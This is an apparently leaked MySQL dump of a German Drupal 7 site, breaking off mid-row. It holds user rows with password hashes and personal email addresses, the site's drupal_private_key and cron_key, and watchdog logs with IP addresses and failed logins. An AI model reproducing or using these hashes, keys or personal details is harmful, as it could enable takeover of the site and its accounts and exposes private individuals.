(0,'','','','','',NULL,0,0,0,0,NULL,'',0,'',NULL),(1,'Olli','$S$DLi06gZxB3Sv5swHVBL.1J3p0Tt17qjQc4xQipTvbrBQmYJgdR48','piratolli@ollital.de','','','filtered_html',1415823734,1426848121,1426848121,1,'Europe/Berlin','',0,'olli-graf@t9s.de','a:2:{s:7:\"contact\";i:1;s:7:\"overlay\";i:1;}'),(5,'faustinosmythe993','$S$DaosqDN1G3UOXnotO/fUAlmyRC08KT5ITIxJaH2SmS2TseFXKNPd','orhankorkmaz1989@hotmail.com','','','filtered_html',1426806524,0,0,0,'Europe/Berlin','',0,'orhankorkmaz1989@hotmail.com','a:1:{s:7:\"contact\";i:1;}'),(6,'mellissaminton837717','$S$DPK3ZxPSKxAmPMo6ewqLLfojZ9wB2nfogD8NQ9s0GL7RrKoqb0BC','mmoplayer1987@gmail.com','','','filtered_html',1426817343,0,0,0,'Europe/Berlin','',0,'mmoplayer1987@gmail.com','a:1:{s:7:\"contact\";i:1;}'); /*!40000 ALTER TABLE `dpl_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_users_roles` -- DROP TABLE IF EXISTS `dpl_users_roles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_users_roles` ( `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: dpl_users.uid for user.', `rid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Primary Key: dpl_role.rid for role.', PRIMARY KEY (`uid`,`rid`), KEY `rid` (`rid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps users to roles.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_users_roles` -- LOCK TABLES `dpl_users_roles` WRITE; /*!40000 ALTER TABLE `dpl_users_roles` DISABLE KEYS */; INSERT INTO `dpl_users_roles` VALUES (1,3); /*!40000 ALTER TABLE `dpl_users_roles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_variable` -- DROP TABLE IF EXISTS `dpl_variable`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_variable` ( `name` varchar(128) NOT NULL DEFAULT '' COMMENT 'The name of the variable.', `value` longblob NOT NULL COMMENT 'The value of the variable.', PRIMARY KEY (`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Named variable/value pairs created by Drupal core or any...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_variable` -- LOCK TABLES `dpl_variable` WRITE; /*!40000 ALTER TABLE `dpl_variable` DISABLE KEYS */; INSERT INTO `dpl_variable` VALUES ('admin_theme','s:5:\"seven\";'),('clean_url','s:1:\"0\";'),('color_bartik_files','a:2:{i:0;s:39:\"public://color/bartik-37adaa51/logo.png\";i:1;s:41:\"public://color/bartik-37adaa51/colors.css\";}'),('color_bartik_logo','s:39:\"public://color/bartik-37adaa51/logo.png\";'),('color_bartik_palette','a:9:{s:3:\"top\";s:7:\"#bf3707\";s:6:\"bottom\";s:7:\"#e47248\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}'),('color_bartik_stylesheets','a:1:{i:0;s:41:\"public://color/bartik-37adaa51/colors.css\";}'),('comment_page','i:0;'),('cron_key','s:43:\"W7bAGVcNKlW-D5Gz9Bq_VYipUTa7gwRZfmJTQhlGP3g\";'),('cron_last','i:1426848104;'),('css_js_query_string','s:6:\"njly4i\";'),('date_default_timezone','s:13:\"Europe/Berlin\";'),('drupal_http_request_fails','b:0;'),('drupal_private_key','s:43:\"-mxvGzud_FImMrA3ix94VS-GUqITKqi1h-ESzRGmO5o\";'),('file_temporary_path','s:4:\"/tmp\";'),('filter_fallback_format','s:10:\"plain_text\";'),('install_profile','s:8:\"standard\";'),('install_task','s:4:\"done\";'),('install_time','i:1415823880;'),('maintenance_mode','b:0;'),('menu_expanded','a:0:{}'),('menu_masks','a:34:{i:0;i:501;i:1;i:493;i:2;i:250;i:3;i:247;i:4;i:246;i:5;i:245;i:6;i:125;i:7;i:123;i:8;i:122;i:9;i:121;i:10;i:117;i:11;i:63;i:12;i:62;i:13;i:61;i:14;i:60;i:15;i:59;i:16;i:58;i:17;i:44;i:18;i:31;i:19;i:30;i:20;i:29;i:21;i:28;i:22;i:24;i:23;i:21;i:24;i:15;i:25;i:14;i:26;i:13;i:27;i:11;i:28;i:7;i:29;i:6;i:30;i:5;i:31;i:3;i:32;i:2;i:33;i:1;}'),('node_admin_theme','s:1:\"1\";'),('node_cron_last','s:10:\"1426238608\";'),('node_options_page','a:1:{i:0;s:6:\"status\";}'),('node_submitted_page','b:0;'),('path_alias_whitelist','a:0:{}'),('site_default_country','s:2:\"DE\";'),('site_mail','s:16:\"piratolli@t9s.de\";'),('site_name','s:14:\"www.ollital.de\";'),('statistics_day_timestamp','i:1426795203;'),('theme_bartik_settings','a:19:{s:11:\"toggle_logo\";i:1;s:11:\"toggle_name\";i:1;s:13:\"toggle_slogan\";i:1;s:24:\"toggle_node_user_picture\";i:1;s:27:\"toggle_comment_user_picture\";i:1;s:32:\"toggle_comment_user_verification\";i:1;s:14:\"toggle_favicon\";i:1;s:16:\"toggle_main_menu\";i:1;s:21:\"toggle_secondary_menu\";i:1;s:12:\"default_logo\";i:1;s:9:\"logo_path\";s:0:\"\";s:11:\"logo_upload\";s:0:\"\";s:15:\"default_favicon\";i:1;s:12:\"favicon_path\";s:0:\"\";s:14:\"favicon_upload\";s:0:\"\";s:6:\"scheme\";s:0:\"\";s:7:\"palette\";a:9:{s:3:\"top\";s:7:\"#bf3707\";s:6:\"bottom\";s:7:\"#e47248\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}s:5:\"theme\";s:6:\"bartik\";s:4:\"info\";a:12:{s:6:\"fields\";a:9:{s:3:\"top\";s:10:\"Header top\";s:6:\"bottom\";s:13:\"Header bottom\";s:2:\"bg\";s:15:\"Main background\";s:7:\"sidebar\";s:18:\"Sidebar background\";s:14:\"sidebarborders\";s:15:\"Sidebar borders\";s:6:\"footer\";s:17:\"Footer background\";s:11:\"titleslogan\";s:16:\"Title and slogan\";s:4:\"text\";s:10:\"Text color\";s:4:\"link\";s:10:\"Link color\";}s:7:\"schemes\";a:6:{s:7:\"default\";a:2:{s:5:\"title\";s:21:\"Blue Lagoon (default)\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#0779bf\";s:6:\"bottom\";s:7:\"#48a9e4\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f6f6f2\";s:14:\"sidebarborders\";s:7:\"#f9f9f9\";s:6:\"footer\";s:7:\"#292929\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0071B3\";}}s:9:\"firehouse\";a:2:{s:5:\"title\";s:9:\"Firehouse\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#cd2d2d\";s:6:\"bottom\";s:7:\"#cf3535\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#f1f4f0\";s:14:\"sidebarborders\";s:7:\"#ededed\";s:6:\"footer\";s:7:\"#1f1d1c\";s:11:\"titleslogan\";s:7:\"#fffeff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#d6121f\";}}s:3:\"ice\";a:2:{s:5:\"title\";s:3:\"Ice\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#d0d0d0\";s:6:\"bottom\";s:7:\"#c2c4c5\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#cccccc\";s:6:\"footer\";s:7:\"#24272c\";s:11:\"titleslogan\";s:7:\"#000000\";s:4:\"text\";s:7:\"#4a4a4a\";s:4:\"link\";s:7:\"#019dbf\";}}s:4:\"plum\";a:2:{s:5:\"title\";s:4:\"Plum\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4c1c58\";s:6:\"bottom\";s:7:\"#593662\";s:2:\"bg\";s:7:\"#fffdf7\";s:7:\"sidebar\";s:7:\"#edede7\";s:14:\"sidebarborders\";s:7:\"#e7e7e7\";s:6:\"footer\";s:7:\"#2c2c28\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#301313\";s:4:\"link\";s:7:\"#9d408d\";}}s:5:\"slate\";a:2:{s:5:\"title\";s:5:\"Slate\";s:6:\"colors\";a:9:{s:3:\"top\";s:7:\"#4a4a4a\";s:6:\"bottom\";s:7:\"#4e4e4e\";s:2:\"bg\";s:7:\"#ffffff\";s:7:\"sidebar\";s:7:\"#ffffff\";s:14:\"sidebarborders\";s:7:\"#d0d0d0\";s:6:\"footer\";s:7:\"#161617\";s:11:\"titleslogan\";s:7:\"#ffffff\";s:4:\"text\";s:7:\"#3b3b3b\";s:4:\"link\";s:7:\"#0073b6\";}}s:0:\"\";a:2:{s:5:\"title\";s:6:\"Custom\";s:6:\"colors\";a:0:{}}}s:3:\"css\";a:1:{i:0;s:14:\"css/colors.css\";}s:4:\"copy\";a:1:{i:0;s:8:\"logo.png\";}s:9:\"gradients\";a:1:{i:0;a:3:{s:9:\"dimension\";a:4:{i:0;i:0;i:1;i:0;i:2;i:0;i:3;i:0;}s:9:\"direction\";s:8:\"vertical\";s:6:\"colors\";a:2:{i:0;s:3:\"top\";i:1;s:6:\"bottom\";}}}s:4:\"fill\";a:0:{}s:6:\"slices\";a:0:{}s:12:\"blend_target\";s:7:\"#ffffff\";s:11:\"preview_css\";s:17:\"color/preview.css\";s:10:\"preview_js\";s:16:\"color/preview.js\";s:12:\"preview_html\";s:18:\"color/preview.html\";s:10:\"base_image\";s:14:\"color/base.png\";}}'),('theme_default','s:6:\"bartik\";'),('update_last_check','i:1426795207;'),('update_last_email_notification','i:1426795203;'),('update_notify_emails','a:1:{i:0;s:16:\"olli-graf@t9s.de\";}'),('user_admin_role','s:1:\"3\";'),('user_pictures','s:1:\"1\";'),('user_picture_dimensions','s:9:\"1024x1024\";'),('user_picture_file_size','s:3:\"800\";'),('user_picture_style','s:9:\"thumbnail\";'),('user_register','i:2;'); /*!40000 ALTER TABLE `dpl_variable` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `dpl_watchdog` -- DROP TABLE IF EXISTS `dpl_watchdog`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `dpl_watchdog` ( `wid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique watchdog event ID.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The dpl_users.uid of the user who triggered the event.', `type` varchar(64) NOT NULL DEFAULT '' COMMENT 'Type of log message, for example "user" or "page not found."', `message` longtext NOT NULL COMMENT 'Text of log message to be passed into the t() function.', `variables` longblob NOT NULL COMMENT 'Serialized array of variables that match the message string and that is passed into the t() function.', `severity` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'The severity level of the event; ranges from 0 (Emergency) to 7 (Debug)', `link` varchar(255) DEFAULT '' COMMENT 'Link to view the result of the event.', `location` text NOT NULL COMMENT 'URL of the origin of the event.', `referer` text COMMENT 'URL of referring page.', `hostname` varchar(128) NOT NULL DEFAULT '' COMMENT 'Hostname of the user who triggered the event.', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'Unix timestamp of when event occurred.', PRIMARY KEY (`wid`), KEY `type` (`type`), KEY `uid` (`uid`), KEY `severity` (`severity`) ) ENGINE=InnoDB AUTO_INCREMENT=413 DEFAULT CHARSET=utf8 COMMENT='Table that contains logs of all system events.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `dpl_watchdog` -- LOCK TABLES `dpl_watchdog` WRITE; /*!40000 ALTER TABLE `dpl_watchdog` DISABLE KEYS */; INSERT INTO `dpl_watchdog` VALUES (1,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:5:\"dblog\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823754),(2,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:5:\"dblog\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823754),(3,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:8:\"field_ui\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823755),(4,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:8:\"field_ui\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823755),(5,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:4:\"file\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823756),(6,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:4:\"file\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823756),(7,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:7:\"options\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823757),(8,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:7:\"options\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823757),(9,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:8:\"taxonomy\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823758),(10,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:8:\"taxonomy\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823758),(11,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:4:\"help\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823760),(12,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:4:\"help\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823760),(13,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:5:\"image\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823760),(14,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:5:\"image\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823761),(15,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:4:\"list\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823762),(16,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:4:\"list\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823762),(17,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:4:\"menu\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823763),(18,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:4:\"menu\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823765),(19,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:6:\"number\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823767),(20,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:6:\"number\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823767),(21,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:7:\"overlay\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823767),(22,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:7:\"overlay\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823767),(23,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:4:\"path\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823768),(24,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:4:\"path\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823768),(25,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:3:\"rdf\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823769),(26,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:3:\"rdf\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823769),(27,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:6:\"search\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823771),(28,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:6:\"search\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823771),(29,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:8:\"shortcut\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823774),(30,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:8:\"shortcut\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823774),(31,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:7:\"toolbar\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823775),(32,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:7:\"toolbar\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823775),(33,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:8:\"standard\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823785),(34,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:8:\"standard\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=do','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823785),(35,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:15:\"Publish comment\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823788),(36,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:17:\"Unpublish comment\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823788),(37,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:12:\"Save comment\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823788),(38,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:15:\"Publish content\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823788),(39,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:17:\"Unpublish content\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823788),(40,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:19:\"Make content sticky\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823788),(41,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:21:\"Make content unsticky\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823789),(42,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:29:\"Promote content to front page\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823789),(43,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:30:\"Remove content from front page\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823789),(44,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:12:\"Save content\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823789),(45,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:30:\"Ban IP address of current user\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823789),(46,0,'actions','Action \'%action\' added.','a:1:{s:7:\"%action\";s:18:\"Block current user\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en&id=1&op=finished','http://www.ollital.de/cms/install.php?profile=standard&locale=en&op=start&id=1','178.200.65.249',1415823789),(47,0,'system','%module module installed.','a:1:{s:7:\"%module\";s:6:\"update\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en','http://www.ollital.de/cms/install.php?profile=standard&locale=en','178.200.65.249',1415823882),(48,0,'system','%module module enabled.','a:1:{s:7:\"%module\";s:6:\"update\";}',6,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en','http://www.ollital.de/cms/install.php?profile=standard&locale=en','178.200.65.249',1415823882),(49,1,'user','Session opened for %name.','a:1:{s:5:\"%name\";s:4:\"Olli\";}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en','http://www.ollital.de/cms/install.php?profile=standard&locale=en','178.200.65.249',1415823883),(50,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/install.php?profile=standard&locale=en','http://www.ollital.de/cms/install.php?profile=standard&locale=en','178.200.65.249',1415823891),(51,1,'content','@type: added %title.','a:2:{s:5:\"@type\";s:4:\"page\";s:6:\"%title\";s:26:\"Stadtverordneter Olli Graf\";}',5,'view','http://www.ollital.de/cms/?q=node%2Fadd%2Fpage&render=overlay&render=overlay','http://www.ollital.de/cms/?q=node%2Fadd%2Fpage&render=overlay','178.200.65.249',1415825317),(52,1,'content','@type: added %title.','a:2:{s:5:\"@type\";s:4:\"page\";s:6:\"%title\";s:25:\"Sadtverordneter Olli Graf\";}',5,'view','http://www.ollital.de/cms/?q=node%2Fadd%2Fpage&render=overlay&render=overlay&render=overlay','http://www.ollital.de/cms/?q=node%2Fadd%2Fpage&render=overlay&render=overlay','178.200.65.249',1415825486),(53,1,'content','@type: deleted %title.','a:2:{s:5:\"@type\";s:4:\"page\";s:6:\"%title\";s:26:\"Stadtverordneter Olli Graf\";}',5,'','http://www.ollital.de/cms/?q=node%2F1%2Fdelete&destination=%23overlay%3Dadmin%2Fcontent','http://www.ollital.de/cms/?q=node%2F1%2Fdelete&destination=%23overlay%3Dadmin%2Fcontent','178.200.65.249',1415825567),(54,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/','','195.128.43.120',1415858549),(55,0,'user','Login attempt failed for %user.','a:1:{s:5:\"%user\";s:7:\"drupal7\";}',5,'','http://www.ollital.de/cms/?q=node&destination=node','http://www.ollital.de/cms/','195.128.43.120',1415858559),(56,0,'user','Login attempt failed for %user.','a:1:{s:5:\"%user\";s:7:\"drupal7\";}',5,'','http://www.ollital.de/cms/?q=node&destination=node','http://www.ollital.de/cms/?q=node&destination=node','195.128.43.120',1415858573),(57,0,'user','Login attempt failed for %user.','a:1:{s:5:\"%user\";s:7:\"drupal7\";}',5,'','http://www.ollital.de/cms/?q=node&destination=node','http://www.ollital.de/cms/?q=node&destination=node','195.128.43.120',1415858589),(58,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/','','195.128.43.120',1415871844),(59,0,'user','Login attempt failed for %user.','a:1:{s:5:\"%user\";s:7:\"drupal7\";}',5,'','http://www.ollital.de/cms/?q=node&destination=node','http://www.ollital.de/cms/','195.128.43.120',1415871855),(60,0,'user','Login attempt failed for %user.','a:1:{s:5:\"%user\";s:4:\"olli\";}',5,'','http://www.ollital.de/cms/?q=node&destination=node','http://www.ollital.de/cms/?q=node&destination=node','195.128.43.120',1415871879),(61,0,'user','Login attempt failed for %user.','a:1:{s:5:\"%user\";s:4:\"olli\";}',5,'','http://www.ollital.de/cms/?q=node&destination=node','http://www.ollital.de/cms/?q=node&destination=node','195.128.43.120',1415871891),(62,1,'user','Session opened for %name.','a:1:{s:5:\"%name\";s:4:\"Olli\";}',5,'','http://www.ollital.de/cms/?q=node&destination=node','http://www.ollital.de/cms/?q=node&destination=node','195.128.43.120',1415871912),(63,1,'content','@type: updated %title.','a:2:{s:5:\"@type\";s:4:\"page\";s:6:\"%title\";s:25:\"Sadtverordneter Olli Graf\";}',5,'view','http://www.ollital.de/cms/?q=node%2F2%2Fedit&render=overlay&render=overlay&render=overlay','http://www.ollital.de/cms/?q=node%2F2%2Fedit&render=overlay&render=overlay','195.128.43.120',1415872311),(64,1,'content','@type: updated %title.','a:2:{s:5:\"@type\";s:4:\"page\";s:6:\"%title\";s:25:\"Sadtverordneter Olli Graf\";}',5,'view','http://www.ollital.de/cms/?q=node%2F2%2Fedit&render=overlay&render=overlay','http://www.ollital.de/cms/?q=node%2F2%2Fedit&render=overlay','195.128.43.120',1415872446),(65,1,'content','@type: added %title.','a:2:{s:5:\"@type\";s:7:\"article\";s:6:\"%title\";s:7:\"Termine\";}',5,'view','http://www.ollital.de/cms/?q=node%2Fadd%2Farticle&render=overlay&render=overlay','http://www.ollital.de/cms/?q=node%2Fadd%2Farticle&render=overlay','195.128.43.120',1415872534),(66,1,'content','@type: deleted 